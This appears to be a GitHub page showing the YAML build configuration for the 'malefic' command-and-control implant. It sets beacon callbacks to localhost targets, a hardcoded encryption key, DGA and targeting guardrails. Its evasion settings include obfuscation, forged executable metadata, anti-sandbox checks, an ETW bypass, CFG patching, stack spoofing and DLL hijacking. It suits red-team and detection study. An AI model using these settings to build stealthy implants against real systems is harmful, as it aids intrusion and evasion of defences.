-
Notifications
You must be signed in to change notification settings - Fork 90
Expand file tree
/
Copy pathimplant.yaml
More file actions
156 lines (145 loc) · 3.89 KB
/
implant.yaml
File metadata and controls
156 lines (145 loc) · 3.89 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
basic:
name: "malefic"
proxy:
use_env_proxy: false
url: ""
cron: "*/5 * * * * * *" # cron express
jitter: 0.2
keepalive: false
retry: 10 # 每个目标允许的连续失败次数
max_cycles: -1 # 最大循环次数,-1 表示无限循环
encryption: aes
key: maliceofinternal
secure:
enable: false
private_key: "" # implant private key
public_key: "" # server public key
# DGA配置
dga:
enable: false
key: "malefic_dga_2024" # key
interval_hours: 8 # generate once every 8 hours
# Guardrail配置 - 环境检测防护
guardrail:
enable: false
require_all: true
ip_addresses: []
usernames: []
server_names: []
domains: []
targets:
# tcp
- address: "127.0.0.1:5001"
build:
obfstr: true
zigbuild: false
toolchain: "nightly-2024-02-03"
ollvm:
enable: false
bcfobf: false # Bogus Control Flow Obfuscation
splitobf: false # Split Control Flow Obfuscation
subobf: false # Instruction Substitution Obfuscation
fco: false # Function CallSite Obfuscation
constenc: false # Constant Encryption Obfuscation
metadata:
icon: ""
compile_time: "24 Jun 2015 18:03:01"
file_version: ""
product_version: ""
company_name: ""
product_name: ""
original_filename: "normal.exe"
file_description: "normal"
internal_name: ""
require_admin: false # whether to require admin privilege
require_uac: false # whether to require uac privilege
pulse:
flags:
start: 0x41
end: 0x42
magic: "beautiful"
artifact_id: 0
encryption: xor
key: "maliceofinternal"
target: 127.0.0.1:80
protocol: "http"
http:
method: "POST"
path: "/pulse"
host: "127.0.0.1"
version: "1.1"
headers:
User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0"
implants:
runtime: tokio # async runtime: smol/tokio/async-std
mod: beacon # malefic mod: beacon/bind
register_info: true # whether collect sysinfo when register
hot_load: true # enable hot load module
modules:
# module when malefic compile
- "full"
enable_3rd: false # enable 3rd module
3rd_modules:
# 3rd module when malefic compile
- full
prelude: "" # prelude config filename
pack: [] # pack
# - src: "1.docx"
# dst: "1.docs"
flags:
start: 0x41
end: 0x42
magic: "beautiful"
artifact_id: 0x1
# for professional
anti:
# 反沙箱反调试反编译反取证相关
sandbox: false
vm: false # enable anti vm
# debug: true # enable anti debug
# disasm: true # enable anti disasm
# emulator: true # enable anti emulator
# forensic: true # enable anti forensic
apis:
# apis_level: "sys_apis", "nt_apis"
level: "nt_apis"
# apis_priority: "normal", "user_defined_dyanmic", "func_syscall" "syscalls"
priority:
normal:
enable: false
type: "normal"
dynamic:
enable: true
# type: "sys_dynamic", "user_defined_dynamic"
type: "user_defined_dynamic"
syscalls:
enable: false
# type: "func_syscall", "inline_syscall"
type: "inline_syscall"
alloctor:
# inprocess: "VirtualAlloc", "VirtualAllocEx",
# "VirtualAllocExNuma", "HeapAlloc",
# "NtMapViewOfSection", "NtAllocateVirtualMemory"
inprocess: "NtAllocateVirtualMemory"
# allocter_ex: "VirtualAllocEx", "NtAllocateVirtualMemory",
# "VirtualAllocExNuma", "NtMapViewOfSection"
crossprocess: "NtAllocateVirtualMemory"
thread_stack_spoofer: true
loader:
evader:
anti_emu: true
etw_pass: true
god_speed: true
sleep_encrypt: false
anti_forensic: false
cfg_patch: true
api_untangle: false
normal_api: false
proxydll:
proxyfunc: ""
raw_dll: "" #
proxied_dll: ""
proxy_dll: ""
pack_resources: true
block: false
hijack_dllmain: true